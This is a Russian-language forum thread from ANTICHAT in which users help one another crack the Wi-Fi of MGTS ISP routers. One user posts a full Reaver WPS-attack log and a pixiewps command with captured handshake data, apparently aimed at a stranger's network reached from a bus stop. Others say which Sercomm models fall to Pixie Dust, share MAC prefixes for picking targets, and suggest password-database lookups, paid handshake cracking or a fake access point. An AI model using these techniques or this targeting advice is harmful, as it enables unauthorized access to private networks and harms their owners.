ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.06.2019, 01:50
|
|
Познавший АНТИЧАТ
Регистрация: 24.03.2012
Сообщений: 1,121
Провел на форуме:
418750
Репутация:
24
|
|
Cyclic M1-M2-NACK-NACK -- WPS is locked or in PBC-mode only (more likely).
|
|
|
22.06.2019, 12:22
|
|
Постоянный
Регистрация: 24.05.2015
Сообщений: 315
Провел на форуме:
68152
Репутация:
0
|
|
Пробую мгтс роутер через pixiewps, но чет не выходит
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching wlan1 to channel 1
[+] Restored previous session
[+] Waiting for beacon from 78:94:B4:A7:F0:0B
[+] Received beacon from 78:94:B4:A7:F0:0B
[+] Vendor: Broadcom
[+] Trying pin "29508860"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 78:94:B4:A7:F0:0B (ESSID: MGTS_GPON_1244)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "29508860"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 78:94:B4:A7:F0:0B (ESSID: MGTS_GPON_1244)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "29508860"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 78:94:B4:A7:F0:0B (ESSID: MGTS_GPON_1244)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "29508860"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 78:94:B4:A7:F0:0B (ESSID: MGTS_GPON_1244)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "29508860"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 78:94:B4:A7:F0:0B (ESSID: MGTS_GPON_1244)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
executing pixiewps -e ca58311fd7670e3ab5df289152a60a9b4f08a7a764fe5fcd8d b14916d32924a5c2974df235dbee8eb194e1e7d54153757d31 7feda2ccfd31adefa5c6138489ef3a74094a18f15305737f41 f3fd868e716c20e4a52d24f0757d30a8cac5c4a02c70476000 13112be7aed2f812c4b1068d7b205776d4ae704e138cb3888f af5e58b101ee03af137f9f180cc4c6ff309cd48759243de9cc de5af0cb8bdee164f61d72cff494eff921aef8c3c1e6853f60 f1140bcb4c57866d2d5690c14d518d2b1c -s 213f72ab4b387fb072b81a23d53c784162e41e6a1784629ad9 8d5605759c7908 -z 4edd5d3887fa4afc11ae95efb9bd32eabb2a91af5100ee5710 37dabe4d49489e -a 9fc3f75289e25d4d358693e74ee2966fab3e1323e7f021dff5 1f40709c53f51b -n e82ffae4f879267d87fde5b2a84b9540 -r 46aba5645bc467b829c40d87d69c1436c3e460f989c4f51a4b 8019c6243f1a94497c97afc94a2c6cda57020801f3d4f8faf5 ef0252b99232616383337d12c5ee86e84d93a9017fc0a6eb14 0d601c7a016bd63e9ef664dc4be2cbee38f2c1096fdfa071c4 673143f9909eebce20838ad79c2aa900af1bcaaca29e120a3c 8c2b044e3e48506c0017bbf11c2293ffaabe15db2d8c710808 a8a58b75c767480abbb835b2e448d23299eb7ba3a7d02737ce 7c5e490d35a1797535a5155638e6e5e33b
Pixiewps 1.4
[-] WPS pin not found!
[*] Time taken: 7 s 833 ms
Они не уязвимы или надо 1.2 версией пробовать ?
|
|
|
|
22.06.2019, 13:46
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Сообщение от roman921
Они не уязвимы или надо 1.2 версией пробовать ?
Судя по логу плохой уровень приёма сигнала (точка тебя плохо слышит).
|
|
|
|
22.06.2019, 14:41
|
|
Постоянный
Регистрация: 24.05.2015
Сообщений: 315
Провел на форуме:
68152
Репутация:
0
|
|
Сообщение от binarymaster
Судя по логу плохой уровень приёма сигнала (точка тебя плохо слышит).
Да, но ведь в конечном итоге пакеты m1,m2,m3 получены для рассчета pixiewps утилиты. Или ты про то, что эти сами данные могут из-за плохого сигнала идти с ошибками и ривер это не показывает в логе ?
С опцией force сразу выходит и также пишет, что не найден.
Стоял ловил awus036nha + openwrt gl-ar300m с остановки. Было -77 сигнал при скане.
|
|
|
|
22.06.2019, 15:33
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Сообщение от roman921
Или ты про то, что эти сами данные могут из-за плохого сигнала идти с ошибками и ривер это не показывает в логе ?
Нет, я про то, что при плохом сигнале трудно добиться, чтобы точка последовательно ответила на все пакеты до победного M7.
Данные с ошибками не придут, проверки выполняются на уровне протокола 802.11.
Сообщение от roman921
С опцией force сразу выходит и также пишет, что не найден.
То, что точка неуязвима к pixie dust, это понятно сразу.
|
|
|
|
22.06.2019, 15:46
|
|
Постоянный
Регистрация: 24.05.2015
Сообщений: 315
Провел на форуме:
68152
Репутация:
0
|
|
Сообщение от binarymaster
при плохом сигнале трудно добиться, чтобы точка последовательно ответила на все пакеты до победного M7.
Да но это и не требовалось, если бы пин нашелся, я бы тогда поискал где место получше сигнала там.
Сообщение от binarymaster
точка неуязвима к pixie dust
Читал этот пост https://forum.antichat.ru/threads/310835/page-170#post-3975181
А известно какие модели мгтсов ломаются пихиевпс, так как там пассы обычно сложные и если не ломается впс, то проще других наловить.
|
|
|
|
22.06.2019, 19:12
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Сообщение от roman921
А известно какие модели мгтсов ломаются пихиевпс
Только старые RV6688BCM. И у них ещё часто пустой пин.
|
|
|
|
22.06.2019, 19:14
|
|
Постоянный
Регистрация: 24.05.2015
Сообщений: 315
Провел на форуме:
68152
Репутация:
0
|
|
Сообщение от binarymaster
Только старые RV6688BCM.
Было бы еще круто табличку моделей этих роутеров и маков их для изучения.
|
|
|
|
23.06.2019, 01:32
|
|
Elder - Старейшина
Регистрация: 23.05.2012
Сообщений: 3,462
Провел на форуме:
1070390
Репутация:
81
|
|
Сообщение от roman921
и маков их для изучения.
:xx:xx:xx 94:4a:0c:xx:xx:xx d4:21:22:xx:xx:xx
|
|
|
|
23.06.2019, 01:37
|
|
Участник форума
Регистрация: 16.02.2017
Сообщений: 220
Провел на форуме:
61909
Репутация:
13
|
|
У МГТС на Broadcom сейчас в основном распространены следующие станции (AP)
- SERCOMM RV6699 двухдиапозонник 2.4/5Ггц
- SERCOMM RV6688 2.4Ггц, (хз, мож кому и везло ломать с пустым pin, но мне чёт ни как, возможно это зависит от прошивки устройства)
и дело даже не в 5-ти попытках подбора или в том числе pixie dust, после чего вышеуказанные устройства сразу уходят в lock,
а в том, что по дефолту возможность подключения по pin попросту отстутсвует и этот функционал можно только активировать зайдя в вебморду
На мой взгляд, есть 3 решения этого вопроса:
- см. на карте или пользоваться поиском на ресурсе 3wifi.stascorp.com
- поймать хендшейк и разместить его в платном разделе подбора паролей, т.к. опять же по дефолту пароль в 99,9% будет не простой
- поднимать "фейк AP"
Сообщение от binarymaster
Только старые RV6688BCM. И у них ещё часто пустой пин.
разьясни, please
на счет SERCOMM RV6688/BCM (~ ревизии, прошивки, версии)
thank you in advance |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
